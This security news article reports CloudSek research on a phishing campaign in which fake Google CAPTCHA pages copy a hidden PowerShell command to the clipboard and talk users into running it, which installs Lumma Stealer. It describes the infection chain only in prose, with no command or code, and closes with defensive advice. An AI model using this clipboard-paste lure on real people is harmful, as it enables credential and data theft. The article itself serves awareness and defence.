- Phishing campaign mimics CAPTCHA to deliver hidden malware commands
- PowerShell command hidden in verification leads to Lumma Stealer attack
- Educating users on phishing tactics is key to preventing such attacks
CloudSek has revealed a sophisticated method of distributing the Lumma Stealer malware, which poses a serious threat to Windows users.
This technique relies on deceptive human verification pages that trick users into unwittingly executing malicious commands.
Although the campaign is primarily focused on spreading the Lumma Stealer malware, its methodology could potentially be adapted to deliver a wide variety of other malicious software.
This is how the phishing campaign works
The campaign uses trusted platforms such as Amazon S3 and various Content Delivery Networks (CDNs) to host phishing websites, using modular malware delivery where the initial executable downloads additional components or modules, thereby complicating detection and analysis efforts.
The infection chain in this phishing campaign begins with threat actors luring victims to phishing websites that mimic legitimate Google CAPTCHA verification pages. These pages are presented as a necessary identity verification step, tricking users into thinking they are completing a standard security check.
The attack takes a more deceptive turn when the user clicks on the “Confirm” button. Behind the scenes, a hidden JavaScript function is activated that copies a base64-encoded PowerShell command to the user’s clipboard without their knowledge. The phishing site then instructs the user to perform an unusual series of steps, such as opening the Run dialog box (Win+R) and pasting the copied command. These instructions, when followed, cause the PowerShell command to be executed in a hidden window that is invisible to the user, making detection of the victim nearly impossible.
The hidden PowerShell command is the core of the attack. It connects to a remote server to download additional content such as a text file (a.txt) containing instructions to download and execute the Lumma Stealer malware. Once installed on the system, this malware establishes connections with attacker-controlled domains. This allows attackers to compromise the system, steal sensitive data and potentially initiate additional malicious activities.
To protect against this phishing campaign, users and organizations alike must prioritize security awareness and implement proactive defenses. A critical first step is user education.
The deceptive nature of these attacks – disguised as legitimate verification processes – shows the importance of informing users of the dangers of following suspicious prompts, especially when they are asked to copy and paste unknown commands. Users must be trained to recognize phishing tactics and question unexpected CAPTCHA confirmations or unfamiliar instructions that involve running system commands.
In addition to education, implementing robust endpoint protection is critical to defending against PowerShell-based attacks. Since attackers in this campaign rely heavily on PowerShell to execute malicious code, organizations should ensure that their security solutions are capable of detecting and blocking these activities. Advanced endpoint protection tools with behavioral analysis and real-time monitoring can detect unusual command executions, helping to prevent the malware from being downloaded and installed.
Organizations should also take a proactive approach by monitoring network traffic for suspicious activity. Security teams must pay close attention to connections with newly registered or unusual domains, which are often used by attackers to distribute malware or steal sensitive data.
Finally, keeping systems updated with the latest patches is a crucial defense mechanism. Regular updates ensure that known vulnerabilities are addressed, limiting the opportunity for attackers to exploit outdated software in their efforts to distribute malware like Lumma Stealer.
“This new tactic is particularly dangerous because it plays on users’ trust in commonly accepted CAPTCHA verifications that they encounter regularly online. By hiding malicious activity behind what appears to be a routine security check, attackers can easily trick users into execute malicious commands on their What is more worrying is that this technique that currently distributes Lumma Stealer can be adapted to spread other types of malware, making it a very versatile and versatile. evolving threat,” said Anshuman Das, security researcher at CloudSEK.
